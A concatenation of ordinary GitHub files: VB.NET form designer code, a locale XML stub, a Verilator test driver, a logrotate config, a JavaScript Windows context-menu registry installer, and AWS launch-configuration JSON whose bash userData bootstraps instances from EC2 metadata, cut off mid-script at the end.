resources.ApplyResources(Me.lblSPUnits, "lblSPUnits")
Me.lblSPUnits.Name = "lblSPUnits"
Me.ToolTip1.SetToolTip(Me.lblSPUnits, resources.GetString("lblSPUnits.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.lblSPUnits, resources.GetString("lblSPUnits.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.lblSPUnits, resources.GetString("lblSPUnits.ToolTip2"))
'
'btnOpenControlPanel
'
resources.ApplyResources(Me.btnOpenControlPanel, "btnOpenControlPanel")
Me.btnOpenControlPanel.Name = "btnOpenControlPanel"
Me.ToolTip1.SetToolTip(Me.btnOpenControlPanel, resources.GetString("btnOpenControlPanel.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.btnOpenControlPanel, resources.GetString("btnOpenControlPanel.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.btnOpenControlPanel, resources.GetString("btnOpenControlPanel.ToolTip2"))
Me.btnOpenControlPanel.UseVisualStyleBackColor = True
'
'tbSetPoint
'
resources.ApplyResources(Me.tbSetPoint, "tbSetPoint")
Me.tbSetPoint.Name = "tbSetPoint"
Me.ToolTipValues.SetToolTip(Me.tbSetPoint, resources.GetString("tbSetPoint.ToolTip"))
Me.ToolTip1.SetToolTip(Me.tbSetPoint, resources.GetString("tbSetPoint.ToolTip1"))
Me.ToolTipChangeTag.SetToolTip(Me.tbSetPoint, resources.GetString("tbSetPoint.ToolTip2"))
'
'Label3
'
resources.ApplyResources(Me.Label3, "Label3")
Me.Label3.Name = "Label3"
Me.ToolTip1.SetToolTip(Me.Label3, resources.GetString("Label3.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.Label3, resources.GetString("Label3.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.Label3, resources.GetString("Label3.ToolTip2"))
'
'chkSolveGlobal
'
resources.ApplyResources(Me.chkSolveGlobal, "chkSolveGlobal")
Me.chkSolveGlobal.Name = "chkSolveGlobal"
Me.ToolTip1.SetToolTip(Me.chkSolveGlobal, resources.GetString("chkSolveGlobal.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.chkSolveGlobal, resources.GetString("chkSolveGlobal.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.chkSolveGlobal, resources.GetString("chkSolveGlobal.ToolTip2"))
Me.chkSolveGlobal.UseVisualStyleBackColor = True
'
'GroupBox1
'
resources.ApplyResources(Me.GroupBox1, "GroupBox1")
Me.GroupBox1.Controls.Add(Me.chkUseReferenced)
Me.GroupBox1.Controls.Add(Me.lblRefVal)
Me.GroupBox1.Controls.Add(Me.Label9)
Me.GroupBox1.Controls.Add(Me.Label10)
Me.GroupBox1.Controls.Add(Me.cbRefProp)
Me.GroupBox1.Controls.Add(Me.cbRefObj)
Me.GroupBox1.Controls.Add(Me.lblTargetVal)
Me.GroupBox1.Controls.Add(Me.lblSourceVal)
Me.GroupBox1.Controls.Add(Me.Label6)
Me.GroupBox1.Controls.Add(Me.Label5)
Me.GroupBox1.Controls.Add(Me.Label2)
Me.GroupBox1.Controls.Add(Me.cbTargetProp)
Me.GroupBox1.Controls.Add(Me.cbTargetObj)
Me.GroupBox1.Controls.Add(Me.Label4)
Me.GroupBox1.Controls.Add(Me.Label7)
Me.GroupBox1.Controls.Add(Me.cbSourceProp)
Me.GroupBox1.Controls.Add(Me.cbSourceObj)
Me.GroupBox1.Controls.Add(Me.Label19)
Me.GroupBox1.Name = "GroupBox1"
Me.GroupBox1.TabStop = False
Me.ToolTipChangeTag.SetToolTip(Me.GroupBox1, resources.GetString("GroupBox1.ToolTip"))
Me.ToolTipValues.SetToolTip(Me.GroupBox1, resources.GetString("GroupBox1.ToolTip1"))
Me.ToolTip1.SetToolTip(Me.GroupBox1, resources.GetString("GroupBox1.ToolTip2"))
'
'chkUseReferenced
'
resources.ApplyResources(Me.chkUseReferenced, "chkUseReferenced")
Me.chkUseReferenced.Name = "chkUseReferenced"
Me.ToolTip1.SetToolTip(Me.chkUseReferenced, resources.GetString("chkUseReferenced.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.chkUseReferenced, resources.GetString("chkUseReferenced.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.chkUseReferenced, resources.GetString("chkUseReferenced.ToolTip2"))
Me.chkUseReferenced.UseVisualStyleBackColor = True
'
'lblRefVal
'
resources.ApplyResources(Me.lblRefVal, "lblRefVal")
Me.lblRefVal.Name = "lblRefVal"
Me.ToolTip1.SetToolTip(Me.lblRefVal, resources.GetString("lblRefVal.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.lblRefVal, resources.GetString("lblRefVal.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.lblRefVal, resources.GetString("lblRefVal.ToolTip2"))
'
'Label9
'
resources.ApplyResources(Me.Label9, "Label9")
Me.Label9.Name = "Label9"
Me.ToolTip1.SetToolTip(Me.Label9, resources.GetString("Label9.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.Label9, resources.GetString("Label9.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.Label9, resources.GetString("Label9.ToolTip2"))
'
'Label10
'
resources.ApplyResources(Me.Label10, "Label10")
Me.Label10.Name = "Label10"
Me.ToolTip1.SetToolTip(Me.Label10, resources.GetString("Label10.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.Label10, resources.GetString("Label10.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.Label10, resources.GetString("Label10.ToolTip2"))
'
'cbRefProp
'
resources.ApplyResources(Me.cbRefProp, "cbRefProp")
Me.cbRefProp.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList
Me.cbRefProp.FormattingEnabled = True
Me.cbRefProp.Name = "cbRefProp"
Me.ToolTip1.SetToolTip(Me.cbRefProp, resources.GetString("cbRefProp.ToolTip"))
Me.ToolTipValues.SetToolTip(Me.cbRefProp, resources.GetString("cbRefProp.ToolTip1"))
Me.ToolTipChangeTag.SetToolTip(Me.cbRefProp, resources.GetString("cbRefProp.ToolTip2"))
'
'cbRefObj
'
resources.ApplyResources(Me.cbRefObj, "cbRefObj")
Me.cbRefObj.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList
Me.cbRefObj.FormattingEnabled = True
Me.cbRefObj.Name = "cbRefObj"
Me.ToolTip1.SetToolTip(Me.cbRefObj, resources.GetString("cbRefObj.ToolTip"))
Me.ToolTipValues.SetToolTip(Me.cbRefObj, resources.GetString("cbRefObj.ToolTip1"))
Me.ToolTipChangeTag.SetToolTip(Me.cbRefObj, resources.GetString("cbRefObj.ToolTip2"))
'
'lblTargetVal
'
resources.ApplyResources(Me.lblTargetVal, "lblTargetVal")
Me.lblTargetVal.Name = "lblTargetVal"
Me.ToolTip1.SetToolTip(Me.lblTargetVal, resources.GetString("lblTargetVal.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.lblTargetVal, resources.GetString("lblTargetVal.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.lblTargetVal, resources.GetString("lblTargetVal.ToolTip2"))
'
'lblSourceVal
'
resources.ApplyResources(Me.lblSourceVal, "lblSourceVal")
Me.lblSourceVal.Name = "lblSourceVal"
Me.ToolTip1.SetToolTip(Me.lblSourceVal, resources.GetString("lblSourceVal.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.lblSourceVal, resources.GetString("lblSourceVal.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.lblSourceVal, resources.GetString("lblSourceVal.ToolTip2"))
'
'Label6
'
resources.ApplyResources(Me.Label6, "Label6")
Me.Label6.Name = "Label6"
Me.ToolTip1.SetToolTip(Me.Label6, resources.GetString("Label6.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.Label6, resources.GetString("Label6.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.Label6, resources.GetString("Label6.ToolTip2"))
'
'Label5
'
resources.ApplyResources(Me.Label5, "Label5")
Me.Label5.Name = "Label5"
Me.ToolTip1.SetToolTip(Me.Label5, resources.GetString("Label5.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.Label5, resources.GetString("Label5.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.Label5, resources.GetString("Label5.ToolTip2"))
'
'Label2
'
resources.ApplyResources(Me.Label2, "Label2")
Me.Label2.Name = "Label2"
Me.ToolTip1.SetToolTip(Me.Label2, resources.GetString("Label2.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.Label2, resources.GetString("Label2.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.Label2, resources.GetString("Label2.ToolTip2"))
'
'cbTargetProp
'
resources.ApplyResources(Me.cbTargetProp, "cbTargetProp")
Me.cbTargetProp.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList
Me.cbTargetProp.FormattingEnabled = True
Me.cbTargetProp.Name = "cbTargetProp"
Me.ToolTip1.SetToolTip(Me.cbTargetProp, resources.GetString("cbTargetProp.ToolTip"))
Me.ToolTipValues.SetToolTip(Me.cbTargetProp, resources.GetString("cbTargetProp.ToolTip1"))
Me.ToolTipChangeTag.SetToolTip(Me.cbTargetProp, resources.GetString("cbTargetProp.ToolTip2"))
'
'cbTargetObj
'
resources.ApplyResources(Me.cbTargetObj, "cbTargetObj")
Me.cbTargetObj.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList
Me.cbTargetObj.FormattingEnabled = True
Me.cbTargetObj.Name = "cbTargetObj"
Me.ToolTip1.SetToolTip(Me.cbTargetObj, resources.GetString("cbTargetObj.ToolTip"))
Me.ToolTipValues.SetToolTip(Me.cbTargetObj, resources.GetString("cbTargetObj.ToolTip1"))
Me.ToolTipChangeTag.SetToolTip(Me.cbTargetObj, resources.GetString("cbTargetObj.ToolTip2"))
'
'Label4
'
resources.ApplyResources(Me.Label4, "Label4")
Me.Label4.Name = "Label4"
Me.ToolTip1.SetToolTip(Me.Label4, resources.GetString("Label4.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.Label4, resources.GetString("Label4.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.Label4, resources.GetString("Label4.ToolTip2"))
'
'Label7
'
resources.ApplyResources(Me.Label7, "Label7")
Me.Label7.Name = "Label7"
Me.ToolTip1.SetToolTip(Me.Label7, resources.GetString("Label7.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.Label7, resources.GetString("Label7.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.Label7, resources.GetString("Label7.ToolTip2"))
'
'cbSourceProp
'
resources.ApplyResources(Me.cbSourceProp, "cbSourceProp")
Me.cbSourceProp.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList
Me.cbSourceProp.FormattingEnabled = True
Me.cbSourceProp.Name = "cbSourceProp"
Me.ToolTip1.SetToolTip(Me.cbSourceProp, resources.GetString("cbSourceProp.ToolTip"))
Me.ToolTipValues.SetToolTip(Me.cbSourceProp, resources.GetString("cbSourceProp.ToolTip1"))
Me.ToolTipChangeTag.SetToolTip(Me.cbSourceProp, resources.GetString("cbSourceProp.ToolTip2"))
'
'cbSourceObj
'
resources.ApplyResources(Me.cbSourceObj, "cbSourceObj")
Me.cbSourceObj.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList
Me.cbSourceObj.FormattingEnabled = True
Me.cbSourceObj.Name = "cbSourceObj"
Me.ToolTip1.SetToolTip(Me.cbSourceObj, resources.GetString("cbSourceObj.ToolTip"))
Me.ToolTipValues.SetToolTip(Me.cbSourceObj, resources.GetString("cbSourceObj.ToolTip1"))
Me.ToolTipChangeTag.SetToolTip(Me.cbSourceObj, resources.GetString("cbSourceObj.ToolTip2"))
'
'Label19
'
resources.ApplyResources(Me.Label19, "Label19")
Me.Label19.Name = "Label19"
Me.ToolTip1.SetToolTip(Me.Label19, resources.GetString("Label19.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.Label19, resources.GetString("Label19.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.Label19, resources.GetString("Label19.ToolTip2"))
'
'ToolTipChangeTag
'
Me.ToolTipChangeTag.ToolTipIcon = System.Windows.Forms.ToolTipIcon.Info
Me.ToolTipChangeTag.ToolTipTitle = "Info"
'
'EditingForm_Adjust
'
resources.ApplyResources(Me, "$this")
Me.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font
Me.Controls.Add(Me.GroupBox1)
Me.Controls.Add(Me.GroupBox5)
Me.Controls.Add(Me.GroupBox4)
Me.Controls.Add(Me.GroupBox2)
Me.Name = "EditingForm_Adjust"
Me.ToolTipChangeTag.SetToolTip(Me, resources.GetString("$this.ToolTip"))
Me.ToolTipValues.SetToolTip(Me, resources.GetString("$this.ToolTip1"))
Me.ToolTip1.SetToolTip(Me, resources.GetString("$this.ToolTip2"))
Me.GroupBox5.ResumeLayout(False)
Me.GroupBox5.PerformLayout()
Me.GroupBox4.ResumeLayout(False)
Me.GroupBox2.ResumeLayout(False)
Me.GroupBox2.PerformLayout()
Me.GroupBox1.ResumeLayout(False)
Me.GroupBox1.PerformLayout()
Me.ResumeLayout(False)
End Sub
Public WithEvents GroupBox5 As System.Windows.Forms.GroupBox
Public WithEvents chkActive As System.Windows.Forms.CheckBox
Public WithEvents Label11 As System.Windows.Forms.Label
Public WithEvents GroupBox4 As System.Windows.Forms.GroupBox
Public WithEvents rtbAnnotations As Extended.Windows.Forms.RichTextBoxExtended
Public WithEvents GroupBox2 As System.Windows.Forms.GroupBox
Public WithEvents GroupBox1 As System.Windows.Forms.GroupBox
Public WithEvents Label7 As System.Windows.Forms.Label
Public WithEvents cbSourceProp As System.Windows.Forms.ComboBox
Public WithEvents cbSourceObj As System.Windows.Forms.ComboBox
Public WithEvents Label19 As System.Windows.Forms.Label
Public WithEvents ToolTip1 As System.Windows.Forms.ToolTip
Public WithEvents lblTag As System.Windows.Forms.TextBox
Public WithEvents Label2 As System.Windows.Forms.Label
Public WithEvents cbTargetProp As System.Windows.Forms.ComboBox
Public WithEvents cbTargetObj As System.Windows.Forms.ComboBox
Public WithEvents Label4 As System.Windows.Forms.Label
Public WithEvents lblTargetVal As System.Windows.Forms.Label
Public WithEvents lblSourceVal As System.Windows.Forms.Label
Public WithEvents Label6 As System.Windows.Forms.Label
Public WithEvents Label5 As System.Windows.Forms.Label
Public WithEvents chkSolveGlobal As System.Windows.Forms.CheckBox
Public WithEvents btnOpenControlPanel As System.Windows.Forms.Button
Public WithEvents tbSetPoint As System.Windows.Forms.TextBox
Public WithEvents Label3 As System.Windows.Forms.Label
Public WithEvents lblSPUnits As System.Windows.Forms.Label
Public WithEvents tbTolerance As System.Windows.Forms.TextBox
Public WithEvents Label1 As System.Windows.Forms.Label
Friend WithEvents ToolTipChangeTag As ToolTip
Friend WithEvents chkUseReferenced As CheckBox
Public WithEvents lblRefVal As Label
Public WithEvents Label9 As Label
Public WithEvents Label10 As Label
Public WithEvents cbRefProp As ComboBox
Public WithEvents cbRefObj As ComboBox
End Class
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8" ?>
<ldml>
<identity>
<version number="$Revision: 1.16 $"/>
<generation date="$Date: 2009/05/05 23:06:38 $"/>
<language type="ny"/>
<territory type="MW"/>
</identity>
</ldml>
| {
"pile_set_name": "Github"
} |
#!/usr/bin/env perl
if (!$::Driver) { use FindBin; exec("$FindBin::Bin/bootstrap.pl", @ARGV, $0); die; }
# DESCRIPTION: Verilator: Verilog Test driver/expect definition
#
# Copyright 2003 by Wilson Snyder. This program is free software; you
# can redistribute it and/or modify it under the terms of either the GNU
# Lesser General Public License Version 3 or the Perl Artistic License
# Version 2.0.
# SPDX-License-Identifier: LGPL-3.0-only OR Artistic-2.0
scenarios(simulator => 1);
compile(
);
execute(
check_finished => 1,
);
ok(1);
1;
| {
"pile_set_name": "Github"
} |
/var/log/centrifugo/*log {
copytruncate
daily
rotate 7
compress
missingok
} | {
"pile_set_name": "Github"
} |
/**
* @see https://msdn.microsoft.com/en-us/library/windows/desktop/cc144171(v=vs.85).aspx
*/
import bluebird from 'bluebird';
import win32Registry from '../win32/registry';
const packageName = 'rodeo',
appName = 'Rodeo',
fileKeyPath = `HKCU\\Software\\Classes\\.py\\shell\\${appName}`,
directoryKeyPath = `HKCU\\Software\\Classes\\directory\\shell\\${appName}`,
backgroundKeyPath = `HKCU\\Software\\Classes\\directory\\background\\shell\\${appName}`,
applicationsKeyPath = `HKCU\\Software\\Classes\\Applications\\${packageName}.exe`;
/**
* Install file handler
* @param {string} execPath
* @param {string} systemRoot
* @returns {Promise.<{errors: Error[], stderr: string, stdout: string}>}
*/
function installFileHandler(execPath, systemRoot) {
const args = [
`${applicationsKeyPath}\\shell\\open\\command`,
'/ve',
'/d',
`\"${execPath}\" \"%1\"`
];
return win32Registry.add(args, systemRoot);
}
/**
* @param {string} execPath
* @param {string} keyPath
* @param {string} arg
* @param {string} systemRoot
* @returns {Promise}
*/
function installMenu(execPath, keyPath, arg, systemRoot) {
const args = [keyPath, '/ve', '/d', `Open with ${appName}`];
return bluebird.all([
win32Registry.add(args, systemRoot),
win32Registry.add([keyPath, '/v', 'Icon', '/d', `\"${execPath}\"`], systemRoot),
win32Registry.add([`${keyPath}\\command`, '/ve', '/d', `\"${execPath}\" \"${arg}\"`], systemRoot)
]);
}
/**
* @param {string} execPath
* @param {string} systemRoot
* @returns {Promise}
*/
function install(execPath, systemRoot) {
return bluebird.all([
installMenu(execPath, fileKeyPath, '%1', systemRoot),
installMenu(execPath, directoryKeyPath, '%1', systemRoot),
installMenu(execPath, backgroundKeyPath, '%V', systemRoot),
installFileHandler(execPath, systemRoot)
]);
}
/**
* @param {string} systemRoot
* @returns {Promise}
*/
function uninstall(systemRoot) {
return bluebird.all([
win32Registry.remove(fileKeyPath, systemRoot),
win32Registry.remove(directoryKeyPath, systemRoot),
win32Registry.remove(backgroundKeyPath, systemRoot),
win32Registry.remove(applicationsKeyPath, systemRoot)
]);
}
module.exports.install = install;
module.exports.uninstall = uninstall;
| {
"pile_set_name": "Github"
} |
[
{
"blockDeviceMappings":
[
],
"class": "com.amazonaws.services.autoscaling.model.LaunchConfiguration",
"createdTime": "2011-10-11T16:14:32Z",
"imageId": "ami-e9ea2680",
"instanceMonitoring": {
"class": "com.amazonaws.services.autoscaling.model.InstanceMonitoring",
"enabled": true
},
"instanceType": "m1.large",
"kernelId": "",
"keyName": "nf-test-keypair-a",
"launchConfigurationARN": "arn:aws:autoscaling:us-east-1:179000000000:launchConfiguration:488db6d8-2b4d-4bc8-a468-48e445c18937:launchConfigurationName/akms-v002-20111011091431",
"launchConfigurationName": "akms-v002-20111011091431",
"ramdiskId": "",
"securityGroups":
[
"akms",
"nf-datacenter",
"nf-infrastructure"
],
"userData": "#!/bin/bash\n# udf0 begin\nexec 1>/var/ec2/userdata.log\nexec 2>&1\nset -x\n\nPATH=/bin:/usr/bin:/usr/sbin:/sbin\n\napp=\"akms\"\nappenv=\"test\"\nregion=\"us-east-1\"\nappuser=\"${app}${appenv}\"\nstack=\"\"\ncluster=\"akms\"\nautogrp=\"akms-v002\"\nlaunchconfig=\"akms-v002-20111011091431\"\nclusterorapp=${cluster:-$app}\nnflxbase=`rpm -q nflx-base | sed 's:nflx-base-1..-\\(.*\\)$:\\1:'`\nappdynappname=\"$region $appenv\"\n\nsetenv_sh=\"/apps/tomcat/bin/setenv.sh\"\nNFenv=\"/apps/tomcat/bin/netflix.env\"\nserver_template_xml=\"/apps/tomcat/conf/server_template.xml\"\nserver_xml=\"/apps/tomcat/conf/server.xml\"\ninstanceid=`/usr/bin/instance-id`\n\n# udf0 end\n# udf-test begin\n\n# udf-test end\n# udf1 begin\nhostnamestring=${clusterorapp}-${instanceid}\nhostname $hostnamestring\nprintf \"/^HOSTNAME/ d\\n $\\na\\nHOSTNAME=${hostnamestring}\\n.\\nw\\nq\\n\" | ed -s /etc/sysconfig/network\necho \"127.0.0.1 localhost\" > /etc/hosts\nprintf \"%s\\t%s %s.netflix.com %s\\n\" `local-ipv4` `hostname` `hostname` `public-hostname` >> /etc/hosts\ntest -n \"$reg_hosts\" && echo $reg_hosts >> /etc/hosts\n\ncurl=\"curl --retry 3 --silent --show-error --fail\"\nmetadatavars() {\nlocal url=$1\nfor uri in `$curl $url`\ndo\necho $uri | grep -q -E '=' && continue\necho $uri | grep -q -E 'public' && continue\nif echo $uri | grep -q -E '/$'\nthen\nmetadatavars \"${url}${uri}\"\nelse\nprintf \"export EC2_%s=\\\"%s\\\"\\n\" `echo $uri | tr '/-' '_' | tr 'a-z' 'A-Z'` \"`$curl ${url}${uri}| tr '\\n' ' '`\"\nfi\ndone\n}\n\nmetadatavars http://169.254.169.254/latest/meta-data/ >> /etc/profile.d/netflix_environment.sh\n. /etc/profile.d/netflix_environment.sh\n\nln -s $jmxf $jmxl\n\nif newbase\nthen\n/usr/local/bin/installcrontab $appuser\nelse\nfi\n\nif ! grep -q '/etc/alternatives/java_sdk/lib/tools.jar' /apps/tomcat/bin/setclasspath.sh\nthen\nfi\n\n# udf1 end\n\nserver_template_crl=/apps/tomcat/conf/server_template_2011.xml \n\n# end added for CRL support\n\ntouch /tmp/udf-complete\n# udf2 end\n\n"
},
{
"blockDeviceMappings":
[
],
"class": "com.amazonaws.services.autoscaling.model.LaunchConfiguration",
"createdTime": "2011-10-11T16:24:57Z",
"imageId": "ami-e9ea2680",
"instanceMonitoring": {
"class": "com.amazonaws.services.autoscaling.model.InstanceMonitoring",
"enabled": true
},
"instanceType": "m1.large",
"kernelId": "",
"keyName": "nf-test-keypair-a",
"launchConfigurationARN": "arn:aws:autoscaling:us-east-1:179000000000:launchConfiguration:f97645c6-2653-4b25-825c-e0d78b991b28:launchConfigurationName/akms-v002-20111011092456",
"launchConfigurationName": "akms-v002-20111011092456",
"ramdiskId": "",
"securityGroups":
[
"akms",
"nf-datacenter",
"nf-infrastructure"
],
"userData": "#!/bin/bash\n# udf0 begin\nexec 1>/var/ec2/userdata.log\nexec 2>&1\nset -x\n\nPATH=/bin:/usr/bin:/usr/sbin:/sbin\n\napp=\"akms\"\nappenv=\"test\"\nregion=\"us-east-1\"\nappuser=\"${app}${appenv}\"\nstack=\"\"\ncluster=\"akms\"\nautogrp=\"akms-v002\"\nlaunchconfig=\"akms-v002-20111011092456\"\nclusterorapp=${cluster:-$app}\nnflxbase=`rpm -q nflx-base | sed 's:nflx-base-1..-\\(.*\\)$:\\1:'`\nappdynappname=\"$region $appenv\"\n\nsetenv_sh=\"/apps/tomcat/bin/setenv.sh\"\nNFenv=\"/apps/tomcat/bin/netflix.env\"\nserver_template_xml=\"/apps/tomcat/conf/server_template.xml\"\nserver_xml=\"/apps/tomcat/conf/server.xml\"\ninstanceid=`/usr/bin/instance-id`\n\n# udf0 end\n# udf-test begin\n\n# udf-test end\n# udf1 begin\nhostnamestring=${clusterorapp}-${instanceid}\nhostname $hostnamestring\nprintf \"/^HOSTNAME/ d\\n $\\na\\nHOSTNAME=${hostnamestring}\\n.\\nw\\nq\\n\" | ed -s /etc/sysconfig/network\necho \"127.0.0.1 localhost\" > /etc/hosts\nprintf \"%s\\t%s %s.netflix.com %s\\n\" `local-ipv4` `hostname` `hostname` `public-hostname` >> /etc/hosts\ntest -n \"$reg_hosts\" && echo $reg_hosts >> /etc/hosts\n\ncurl=\"curl --retry 3 --silent --show-error --fail\"\nmetadatavars() {\nlocal url=$1\nfor uri in `$curl $url`\ndo\necho $uri | grep -q -E '=' && continue\necho $uri | grep -q -E 'public' && continue\nif echo $uri | grep -q -E '/$'\nthen\nmetadatavars \"${url}${uri}\"\nelse\nprintf \"export EC2_%s=\\\"%s\\\"\\n\" `echo $uri | tr '/-' '_' | tr 'a-z' 'A-Z'` \"`$curl ${url}${uri}| tr '\\n' ' '`\"\nfi\ndone\n}\n\nmetadatavars http://169.254.169.254/latest/meta-data/ >> /etc/profile.d/netflix_environment.sh\n. /etc/profile.d/netflix_environment.sh\n\nln -s $jmxf $jmxl\n\nif newbase\nthen\n/usr/local/bin/installcrontab $appuser\nelse\nfi\n\nif ! grep -q '/etc/alternatives/java_sdk/lib/tools.jar' /apps/tomcat/bin/setclasspath.sh\nthen\nfi\n\n# udf1 end\n\nserver_template_crl=/apps/tomcat/conf/server_template_2011.xml \n\n# end added for CRL support\n\ntouch /tmp/udf-complete\n# udf2 end\n\n"
},
{
"blockDeviceMappings":
[
],
"class": "com.amazonaws.services.autoscaling.model.LaunchConfiguration",
"createdTime": "2011-10-11T23:24:15Z",
"imageId": "ami-0df33f64",
"instanceMonitoring": {
"class": "com.amazonaws.services.autoscaling.model.InstanceMonitoring",
"enabled": true
},
"instanceType": "m1.large",
"kernelId": "",
"keyName": "nf-test-keypair-a",
"launchConfigurationARN": "arn:aws:autoscaling:us-east-1:179000000000:launchConfiguration:bbfbd31b-d830-43f3-9f02-80f78b9f1b35:launchConfigurationName/akms-v002-20111011162414",
"launchConfigurationName": "akms-v002-20111011162414",
"ramdiskId": "",
"securityGroups":
[
"akms",
"nf-datacenter",
"nf-infrastructure"
],
"userData": "#!/bin/bash\n# udf0 begin\nexec 1>/var/ec2/userdata.log\nexec 2>&1\nset -x\n\nPATH=/bin:/usr/bin:/usr/sbin:/sbin\n\napp=\"akms\"\nappenv=\"test\"\nregion=\"us-east-1\"\nappuser=\"${app}${appenv}\"\nstack=\"\"\ncluster=\"akms\"\nautogrp=\"akms-v002\"\nlaunchconfig=\"akms-v002-20111011162414\"\nclusterorapp=${cluster:-$app}\nnflxbase=`rpm -q nflx-base | sed 's:nflx-base-1..-\\(.*\\)$:\\1:'`\nappdynappname=\"$region $appenv\"\n\nsetenv_sh=\"/apps/tomcat/bin/setenv.sh\"\nNFenv=\"/apps/tomcat/bin/netflix.env\"\nserver_template_xml=\"/apps/tomcat/conf/server_template.xml\"\nserver_xml=\"/apps/tomcat/conf/server.xml\"\ninstanceid=`/usr/bin/instance-id`\n\n# udf0 end\n# udf-test begin\n\n# udf-test end\n# udf1 begin\nhostnamestring=${clusterorapp}-${instanceid}\nhostname $hostnamestring\nprintf \"/^HOSTNAME/ d\\n $\\na\\nHOSTNAME=${hostnamestring}\\n.\\nw\\nq\\n\" | ed -s /etc/sysconfig/network\necho \"127.0.0.1 localhost\" > /etc/hosts\nprintf \"%s\\t%s %s.netflix.com %s\\n\" `local-ipv4` `hostname` `hostname` `public-hostname` >> /etc/hosts\ntest -n \"$reg_hosts\" && echo $reg_hosts >> /etc/hosts\n\ncurl=\"curl --retry 3 --silent --show-error --fail\"\nmetadatavars() {\nlocal url=$1\nfor uri in `$curl $url`\ndo\necho $uri | grep -q -E '=' && continue\necho $uri | grep -q -E 'public' && continue\nif echo $uri | grep -q -E '/$'\nthen\nmetadatavars \"${url}${uri}\"\nelse\nprintf \"export EC2_%s=\\\"%s\\\"\\n\" `echo $uri | tr '/-' '_' | tr 'a-z' 'A-Z'` \"`$curl ${url}${uri}| tr '\\n' ' '`\"\nfi\ndone\n}\n\nmetadatavars http://169.254.169.254/latest/meta-data/ >> /etc/profile.d/netflix_environment.sh\n. /etc/profile.d/netflix_environment.sh\n\nln -s $jmxf $jmxl\n\nif newbase\nthen\n/usr/local/bin/installcrontab $appuser\nelse\nfi\n\nif ! grep -q '/etc/alternatives/java_sdk/lib/tools.jar' /apps/tomcat/bin/setclasspath.sh\nthen\nfi\n\n# udf1 end\n\nserver_template_crl=/apps/tomcat/conf/server_template_2011.xml \n\n# end added for CRL support\n\ntouch /tmp/udf-complete\n# udf2 end\n\n"
},
{
"blockDeviceMappings":
[
],
"class": "com.amazonaws.services.autoscaling.model.LaunchConfiguration",
"createdTime": "2011-10-14T20:48:49Z",
"imageId": "ami-c13cf0a8",
"instanceMonitoring": {
"class": "com.amazonaws.services.autoscaling.model.InstanceMonitoring",
"enabled": true
},
"instanceType": "m1.large",
"kernelId": "",
"keyName": "nf-test-keypair-a",
"launchConfigurationARN": "arn:aws:autoscaling:us-east-1:179000000000:launchConfiguration:e9b014f9-2201-41a5-964c-f707f0dc22a7:launchConfigurationName/akms-v002-20111014134848",
"launchConfigurationName": "akms-v002-20111014134848",
"ramdiskId": "",
"securityGroups":
[
"akms",
"nf-datacenter",
"nf-infrastructure"
],
"userData": "#!/bin/bash\n# udf0 begin\nexec 1>/var/ec2/userdata.log\nexec 2>&1\nset -x\n\nPATH=/bin:/usr/bin:/usr/sbin:/sbin\n\napp=\"akms\"\nappenv=\"test\"\nregion=\"us-east-1\"\nappuser=\"${app}${appenv}\"\nstack=\"\"\ncluster=\"akms\"\nautogrp=\"akms-v002\"\nlaunchconfig=\"akms-v002-20111014134848\"\nclusterorapp=${cluster:-$app}\nnflxbase=`rpm -q nflx-base | sed 's:nflx-base-1..-\\(.*\\)$:\\1:'`\nappdynappname=\"$region $appenv\"\n\nsetenv_sh=\"/apps/tomcat/bin/setenv.sh\"\nNFenv=\"/apps/tomcat/bin/netflix.env\"\nserver_template_xml=\"/apps/tomcat/conf/server_template.xml\"\nserver_xml=\"/apps/tomcat/conf/server.xml\"\ninstanceid=`/usr/bin/instance-id`\n\n# udf0 end\n# udf-test begin\n\n# udf-test end\n# udf1 begin\nhostnamestring=${clusterorapp}-${instanceid}\nhostname $hostnamestring\nprintf \"/^HOSTNAME/ d\\n $\\na\\nHOSTNAME=${hostnamestring}\\n.\\nw\\nq\\n\" | ed -s /etc/sysconfig/network\necho \"127.0.0.1 localhost\" > /etc/hosts\nprintf \"%s\\t%s %s.netflix.com %s\\n\" `local-ipv4` `hostname` `hostname` `public-hostname` >> /etc/hosts\ntest -n \"$reg_hosts\" && echo $reg_hosts >> /etc/hosts\n\ncurl=\"curl --retry 3 --silent --show-error --fail\"\nmetadatavars() {\nlocal url=$1\nfor uri in `$curl 